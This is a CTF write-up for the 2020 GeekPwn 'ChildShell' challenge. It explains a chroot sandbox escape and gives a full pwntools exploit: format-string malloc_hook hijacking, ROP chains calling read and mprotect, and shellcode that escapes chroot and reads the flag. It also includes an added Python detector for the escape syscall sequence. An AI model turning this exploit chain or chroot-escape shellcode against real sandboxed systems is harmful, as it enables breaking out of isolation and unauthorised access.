2020-GeekPwn-ChildShell

# 1. Inspecting the file

This challenge requires escaping a chroot sandbox.

# 2. IDA analysis

There is an extra chroot call that sets our root directory to sandbox, while the flag lives outside it. The rest of the program logic is identical to the earlier easyshell.

# 3. Approach

Hijack malloc_hook, call mprotect to obtain a region where shellcode can execute, and finally run shellcode that escapes the chroot.

Since hijacking malloc_hook was already worked through in detail in easyshell, here we only discuss the chroot-escape shellcode.

The steps are as follows:

Step 1: invoke the mkdir syscall with rdi pointing to the string ".42" and mode = 0x1ed.

Step 2: invoke the chroot syscall with rdi pointing to ".42".
Step 3: invoke the chroot syscall with rdi pointing to "../../../../../".
At this point the sandbox escape is complete, and a plain cat can read the flag afterwards.
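The three-step chain above works because chroot(2) changes only the root of the calling process, not its working directory: after chrooting into ".42" the process's cwd still lies outside the new root, so a relative path made of ".." components walks up to the real filesystem root. It also only works because the sandboxed process still holds CAP_SYS_CHROOT, which is why a real sandbox drops that capability (or filters chroot with seccomp) after entering the jail. The following added example is not part of the original writeup: it parses a small constructed strace-style trace and flags any process that performs mkdir(d) -> chroot(d) -> chroot(all-".." path), the exact sequence the shellcode in this post issues. The trace lines, pids and the `detect_chroot_escape` / `parse_line` / `is_parent_traversal` names are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed strace-style trace ("<pid> <syscall>(<args>) = <ret>") for this example.
# pid 4242 performs the escape chain from the writeup; 4243 and 4244 are benign noise
# (a build step, and a service that chroots once and then chdir("/")s as it should).
SAMPLE_TRACE = """\
4242 mkdir(".42", 0755) = 0
4242 chroot(".42") = 0
4242 chroot("../../../../../") = 0
4242 execve("/bin/cat", ["cat", "flag"], 0x7ffd00001000 /* 12 vars */) = 0
4243 mkdir("build", 0755) = 0
4243 chdir("build") = 0
4244 chroot("/srv/jail") = 0
4244 chdir("/") = 0
"""

LINE_RE = re.compile(r'^(?P<pid>\d+)\s+(?P<name>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\d+)')
FIRST_STR_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"')


def parse_line(line):
    """Return (pid, syscall name, first string argument or None, return value), or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    s = FIRST_STR_RE.match(m.group('args'))
    path = s.group(1) if s else None
    return int(m.group('pid')), m.group('name'), path, int(m.group('ret'))


def is_parent_traversal(path):
    """True when every component of path is '..', e.g. '../../../../../'."""
    parts = [c for c in path.split('/') if c]
    return bool(parts) and all(c == '..' for c in parts)


def detect_chroot_escape(trace):
    """Per pid, look for mkdir(d) -> chroot(d) -> chroot(<only ..>) on successful calls.

    Returns a list of (pid, [calls forming the chain]) for every pid that completed it.
    """
    created = defaultdict(set)  # pid -> directories it created with mkdir
    inner = {}                  # pid -> (mkdir call, chroot call) once it chrooted into its own dir
    hits = []
    for line in trace.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        pid, name, path, ret = rec
        if ret != 0 or path is None:   # failed calls cannot advance the chain
            continue
        if name == 'mkdir':
            created[pid].add(path)
        elif name == 'chroot':
            if path in created[pid]:
                # step 1 + step 2: the process chrooted into a directory it just made
                inner[pid] = ('mkdir("%s")' % path, 'chroot("%s")' % path)
            elif pid in inner and is_parent_traversal(path):
                # step 3: climbing out of the temporary root is the escape itself
                hits.append((pid, list(inner[pid]) + ['chroot("%s")' % path]))
                del inner[pid]
    return hits


if __name__ == '__main__':
    for pid, chain in detect_chroot_escape(SAMPLE_TRACE):
        print('pid %d: chroot escape chain %s' % (pid, ' -> '.join(chain)))
```

The chain is keyed on successful calls only, so a sandbox that has already dropped CAP_SYS_CHROOT (where the second chroot returns EPERM) never triggers it; that is exactly the state a jail should be in before it runs untrusted input.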

# 4. Exploit

```python
from pwn import *
from fmt_attack import Payload
# https://github.com/pzhxbz/my_ctf_tools/blob/master/fmt_attack/fmt_attack.py
p = process('./pwn')
# p = remote('183.60.136.226', 17564)

context.log_level = 'debug'
context.arch = 'amd64'
'''
0x00000000004199a4 : xchg edi, esp ; add al, 0 ; add dh, dh ; ret
0x0000000000401a36 : pop rdi ; ret
0x0000000000468bf5 : syscall ; ret
0x0000000000479976 : pop rax ; pop rdx ; pop rbx ; ret
0x0000000000401b57 : pop rsi ; ret
'''

# Stage 1: format-string writes that hijack malloc_hook (same idea as easyshell)
a = Payload(10, addon=('%' + str(0x6CB778) + 'x').ljust(0x10, 'a'))
a.add_write_chunk(0x00000000004199a4, 0x6CB788, write_len=4)
a.add_write_chunk(0x0000000000401a36, 0x6CB798, write_len=4)
a.add_write_chunk(0x6CB798 + 0x10, 0x6CB798 + 8, write_len=4)
a.add_write_chunk(0x00000000004009AE, 0x6CB798 + 0x10, write_len=4)
payload = a.get_payload()
gdb.attach(p)
p.recvuntil('Input your message')
p.sendline(payload.ljust(0xc0))
p.recvuntil('Take your message:')

# Stage 2: stack pivot into a ROP chain that reads the next stage into the bss
rop2 = 'flag'.ljust(8, '\x00')
rop2 += p64(0x0000000000401a36) + p64(0)                         # pop rdi ; ret -> rdi = 0 (stdin)
rop2 += p64(0x0000000000479976) + p64(0) + p64(0x1000) + p64(0)  # rax = 0 (read), rdx = 0x1000
rop2 += p64(0x0000000000401b57) + p64(0x6CB798 + 0x18)           # pop rsi ; ret -> destination
rop2 += p64(0x0000000000468bf5)                                  # syscall ; ret
p.clean()
p.sendline(rop2.ljust(0xc0))
'''
0x00000000004a4deb : jmp rsp
'''
# Stage 3: mprotect(0x6ca000, 0x3000, 7) so the bss becomes RWX, then jmp rsp into the shellcode
rop3 = p64(0x0000000000401b58) * 20                              # ret sled
rop3 += p64(0x0000000000401a36) + p64(0x6ca000)                  # rdi = page-aligned address
rop3 += p64(0x0000000000479976) + p64(10) + p64(7) + p64(0)      # rax = 10 (mprotect), rdx = 7 (RWX)
rop3 += p64(0x0000000000401b57) + p64(0x3000)                    # rsi = length
rop3 += p64(0x0000000000468bf5)                                  # syscall ; ret
rop3 += p64(0x00000000004a4deb)                                  # jmp rsp -> shellcode below
shellcode = '''
push 3290158;
mov rdi,rsp;
mov rsi,493;
mov rax,83;
syscall;     # sys_mkdir: 3290158 = 0x32342e, little-endian bytes 2e 34 32 00 = ".42\\0"; 493 = 0x1ed = 0755
mov rdi,rsp;
mov rax,161;
syscall;     # sys_chroot(".42")
mov r15,13280099800329775;   # 0x2f2e2e2f2e2e2f, little-endian bytes "/../../\\0" (second half of the path)
push r15;
mov r15,3327649050063220270; # 0x2e2e2f2e2e2f2e2e, little-endian bytes "../../.." (first half of the path)
push r15;
mov rdi,rsp;
mov rax,161;
syscall;    # sys_chroot("../../../../../"): rsp now points at the two pushed qwords, read as one string
''' + shellcraft.cat('/home/shinnosuke/Desktop/geekpwn/childshell/flag')
rop3 += asm(shellcode)
p.send(rop3)
p.interactive()
```

Reprint policy: xiaoxin 2020-GeekPwn-ChildShell